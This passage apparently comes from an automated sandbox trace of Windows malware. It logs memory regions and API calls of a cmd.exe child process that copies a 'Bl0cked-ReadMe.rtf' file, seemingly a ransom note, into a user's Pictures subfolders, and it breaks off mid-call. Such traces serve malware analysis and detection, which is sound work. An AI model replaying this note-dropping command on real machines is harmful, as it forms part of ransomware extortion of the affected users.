"0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16661 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16662 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16663 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16664 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16665 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16666 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16667 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16668 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16669 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 16670 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16763 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16764 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16765 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16766 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16767 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 16768 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16769 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16770 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16771 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16772 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16773 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16774 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16775 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16776 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16777 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16778 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16779 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16780 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16781 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16782 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16783 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 16784 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 16785 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 16786 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 246 os_tid = 0xfcc [0143.694] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2eff6c | out: lpSystemTimeAsFileTime=0x2eff6c*(dwLowDateTime=0x8f94cf60, dwHighDateTime=0x1d440a9)) [0143.694] GetCurrentProcessId () returned 0x80c [0143.694] GetCurrentThreadId () returned 0xfcc [0143.694] GetTickCount () returned 0x2ce36 [0143.694] QueryPerformanceCounter (in: lpPerformanceCount=0x2eff64 | out: lpPerformanceCount=0x2eff64*=20048309490) returned 1 [0143.695] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.695] __set_app_type (_Type=0x1) [0143.695] __p__fmode () returned 0x76b331f4 [0143.695] __p__commode () returned 0x76b331fc [0143.695] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.695] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.695] GetCurrentThreadId () returned 0xfcc [0143.695] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfcc) returned 0x38 [0143.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.695] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.695] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.696] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.696] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efefc | out: phkResult=0x2efefc*=0x0) returned 0x2 [0143.696] VirtualQuery (in: lpAddress=0x2eff33, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.696] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.696] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.696] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.696] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.696] GetConsoleOutputCP () returned 0x1b5 [0143.696] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.696] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.696] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.696] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.696] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.696] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.697] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.697] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.697] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.697] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.697] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.697] GetEnvironmentStringsW () returned 0x1001a8* [0143.698] FreeEnvironmentStringsW (penv=0x1001a8) returned 1 [0143.698] GetEnvironmentStringsW () returned 0x1001a8* [0143.698] FreeEnvironmentStringsW (penv=0x1001a8) returned 1 [0143.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee6c | out: phkResult=0x2eee6c*=0x40) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0xd0, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x1, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x1, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x0, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x40, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x40, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x40, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegCloseKey (hKey=0x40) returned 0x0 [0143.698] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee6c | out: phkResult=0x2eee6c*=0x40) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x40, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x1, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x1, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x0, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.699] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x9, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.699] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x9, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.699] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x9, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.699] RegCloseKey (hKey=0x40) returned 0x0 [0143.699] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.699] srand (_Seed=0x5b886372) [0143.699] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"" [0143.699] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"" [0143.699] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x101908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.699] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.700] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.700] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.700] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.700] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.700] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.700] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.700] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.700] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.700] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.700] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.700] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.700] GetEnvironmentStringsW () returned 0x1022f8* [0143.700] FreeEnvironmentStringsW (penv=0x1022f8) returned 1 [0143.700] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.700] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.700] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.700] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.700] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.700] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.700] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.700] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.700] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.700] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efc38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.701] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efc38, lpFilePart=0x2efc34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efc34*="Desktop") returned 0x18 [0143.701] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.701] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef9b4 | out: lpFindFileData=0x2ef9b4) returned 0x100038 [0143.701] FindClose (in: hFindFile=0x100038 | out: hFindFile=0x100038) returned 1 [0143.701] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef9b4 | out: lpFindFileData=0x2ef9b4) returned 0x100038 [0143.701] FindClose (in: hFindFile=0x100038 | out: hFindFile=0x100038) returned 1 [0143.701] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef9b4 | out: lpFindFileData=0x2ef9b4) returned 0x100038 [0143.701] FindClose (in: hFindFile=0x100038 | out: hFindFile=0x100038) returned 1 [0143.702] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.702] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.702] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.702] GetEnvironmentStringsW () returned 0x102b18* [0143.702] FreeEnvironmentStringsW (penv=0x102b18) returned 1 [0143.702] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.702] GetConsoleOutputCP () returned 0x1b5 [0143.703] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.703] GetUserDefaultLCID () returned 0x409 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efd78, cchData=128 | out: lpLCData="0") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efd78, cchData=128 | out: lpLCData="0") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efd78, cchData=128 | out: lpLCData="1") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.704] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.705] GetConsoleTitleW (in: lpConsoleTitle=0xf08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.705] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.705] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.705] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.706] _wcsicmp (_String1="type", _String2=")") returned 75 [0143.706] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0143.706] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0143.706] _wcsicmp (_String1="IF", _String2="type") returned -11 [0143.706] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0143.706] _wcsicmp (_String1="REM", _String2="type") returned -2 [0143.706] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0143.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.711] GetFileType (hFile=0x7) returned 0x2 [0143.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2efc70 | out: lpMode=0x2efc70) returned 1 [0143.900] _dup (_FileHandle=1) returned 3 [0143.900] _close (_FileHandle=1) returned 0 [0143.901] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0143.901] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2efc40, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0143.902] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0143.902] GetConsoleTitleW (in: lpConsoleTitle=0x2efa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.902] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0143.902] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0143.902] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0143.902] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0143.903] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.903] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ef5d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef5d4) returned 0xf0ea0 [0143.903] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0143.903] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0143.903] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0143.903] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee4e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0143.904] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0143.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.904] GetFileType (hFile=0x54) returned 0x1 [0143.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.904] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ee538 | out: lpFileSizeHigh=0x2ee538*=0x0) returned 0x1632 [0143.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.904] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.904] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.904] GetFileType (hFile=0x4c) returned 0x1 [0143.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.904] GetFileType (hFile=0x4c) returned 